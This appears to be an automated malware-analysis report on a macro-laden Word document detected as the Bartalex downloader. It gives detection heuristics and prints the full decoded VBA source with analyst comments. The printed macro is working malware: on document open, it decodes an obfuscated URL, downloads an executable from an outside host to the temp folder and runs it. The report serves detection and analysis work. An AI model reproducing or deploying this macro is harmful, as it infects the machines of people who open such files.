Verdict: MALICIOUS (Risk Score: 278)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
- T1204.002 Malicious File
The sample contains VBA macros that utilize the URLDownloadToFileA API to download a file from a remote location. It also references ShellExecuteA, indicating an intent to execute the downloaded content. The ClamAV detection name 'Doc.Downloader.Bartalex-6755229-0' further supports its role as a downloader.
Heuristics (9)
- ClamAV: Doc.Downloader.Bartalex-6755229-0 | critical | CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Bartalex-6755229-0
- Reference to URLDownloadToFile API | critical | SC_STR_URLDOWNLOAD: Reference to URLDownloadToFile API
- VBA macros detected | medium | 3 related findings | OLE_VBA_MACROS: Document contains VBA macro code
  - URLDownloadToFile in VBA | critical | OLE_VBA_DOWNLOAD: URLDownloadToFile in VBA. Matched line in script:
    Private Declare Function NbZquxoNdUFnpKnrFBkyXXyHTwPv Lib "urlmon" Alias "URLDownloadToFileA" (ByVal SlKlwqIrOyIOKWnCJLUsnQSz As Long, ByVal FYhWCxxwBmtAQrrGwzrPtXVDsMDuHRB As String, ByVal AooPXkMgLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvCh As String, ByVal HtJNPHhJoYTIdTKXjRQEqRoAOwNzDeRPJ As Long, ByVal cYvRqvsDGVrsBLGkzSmFApU As Long) As Long
  - Document_Open macro | low | OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script:
    Private Sub Document_Open()
  - Environ() call (env variable access) | low | OLE_VBA_ENVIRON: Environ() call (env variable access). Matched line in script:
    NbZquxoNdUFnpKnrFBkyXXyHTwPv 0, gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ("fyf/sfopc0qvldbc0npd/vpzspgffsgnpecvt00;quui"), Environ$("tmp") & "\" & gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ("fyf/sfopc"), 0, 0
- Reference to ShellExecute API | high | SC_STR_SHELLEXEC: Reference to ShellExecute API
- Suspicious extracted artifact | medium | EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL | info | EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2825 bytes |

SHA-256: 84641e9e6a71780b5fe9a28e93f0aaf4543620e854090223cec17baa96b1b3ec

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 32 of 54 identifiers look randomly generated (e.g. 'oYTIdTKXjRQEqRoAOwNzDeRPJcYvRqvsDGVrsBLG'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Macro Name: UuUgZspLiGyuGWmHvEcWACjDIQFmu
' Analyst note: Win32 imports hidden behind random aliases. The first is ShellExecuteA (shell32.dll),
' the second is URLDownloadToFileA (urlmon); the alias names are what the heuristics above matched on.
Private Declare Function GFNGhdrghsDFBDFgbdgF Lib "shell32.dll" Alias "ShellExecuteA" (ByVal efdiSLTxKJZegXxMEpWYtVbpzThUHiEDgMe As Long, ByVal QUuUgZspLiGyuGWmHvEcW As String, ByVal ACjDIQFmuvtyVdkNbZquxoNdUFnpKnrFBkyXXyHTwP As String, ByVal vSlKlwqIrOyIOKWnCJLUsnQSz As String, ByVal FYhWCxxwBmtAQrrGwzrPtXVDsMDuHRBAooPX As String, ByVal kMgLjBNBztLIfOZfbnEFbclJqTj As Long) As Long
Private Declare Function NbZquxoNdUFnpKnrFBkyXXyHTwPv Lib "urlmon" Alias "URLDownloadToFileA" (ByVal SlKlwqIrOyIOKWnCJLUsnQSz As Long, ByVal FYhWCxxwBmtAQrrGwzrPtXVDsMDuHRB As String, ByVal AooPXkMgLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvCh As String, ByVal HtJNPHhJoYTIdTKXjRQEqRoAOwNzDeRPJ As Long, ByVal cYvRqvsDGVrsBLGkzSmFApU As Long) As Long
Dim oAOwNzDeRPJcYvRqvsDGVr As String, sBLGkzSmFApUefdiSLTxKJ As String, ZegXxMEpWYtVbpzThUHiEDgMeQ As String, vtyVdkNbZquxoNdUFnpKnrFBkyXXy As String, HTwPvSlKlwqIrOyIOKWnCJLUsnQSzFYhWCxxw As String, BmtAQrrGwzrPtXVDsMDuHRBAooPXkM As String, vSlKlwqIrOyIOKWnCJLUsnQSzFYhWCxxwBm As String, tAQrrGwzrPtXVDsMDuHRBAooPXkMgLjBNBztLIfOZfbnEFbcl As String
' Analyst note: string decoder. First loop reverses the input; second loop shifts every
' character back by one code point (Chr(Asc(c) - 1)). The URL and filename literals below
' are stored in this encoded form so they do not appear in plain text in the macro.
Private Function gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ(oYTIdTKXjRQEqRoAOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUe)
Dim fdiSLTxKJZegXxMEpWYtVbpz, ThUHiEDgMeQUuUgZspLiGyuGWm, HvEcWACjDIQFmuvtyVdkNb
y = Len(oYTIdTKXjRQEqRoAOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUe)
For x = y To 1 Step -1
JqTjPVpxnSNOMRCvChHtJNPHhJoYTIdTKXjRQEqRo = Mid(oYTIdTKXjRQEqRoAOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUe, x, 1)
AOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUef = AOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUef & JqTjPVpxnSNOMRCvChHtJNPHhJoYTIdTKXjRQEqRo
Next
For ThUHiEDgMeQUuUgZspLiGyuGWm = 1 To Len(AOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUef)
fdiSLTxKJZegXxMEpWYtVbpz = Mid(AOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUef, ThUHiEDgMeQUuUgZspLiGyuGWm, 1)
HvEcWACjDIQFmuvtyVdkNb = HvEcWACjDIQFmuvtyVdkNb & Chr(Asc(fdiSLTxKJZegXxMEpWYtVbpz) - 1)
Next
gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ = HvEcWACjDIQFmuvtyVdkNb
End Function
' Analyst note: payload routine. Downloads the decoded URL to a decoded filename under %TMP%
' (Environ$("tmp")), then launches that file via ShellExecuteA with the "open" verb.
Private Sub UuUgZspLiGyuGWmHvEcWACjDIQFmu()
NbZquxoNdUFnpKnrFBkyXXyHTwPv 0, gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ("fyf/sfopc0qvldbc0npd/vpzspgffsgnpecvt00;quui"), Environ$("tmp") & "\" & gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ("fyf/sfopc"), 0, 0
GFNGhdrghsDFBDFgbdgF 0, "open", Environ$("tmp") & "\" & gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ("fyf/sfopc"), "", vbNullString, vbNormalFocus
End Sub
' Analyst note: auto-execution trigger; fires when the document is opened and macros are enabled.
Private Sub Document_Open()
UuUgZspLiGyuGWmHvEcWACjDIQFmu
End Sub
```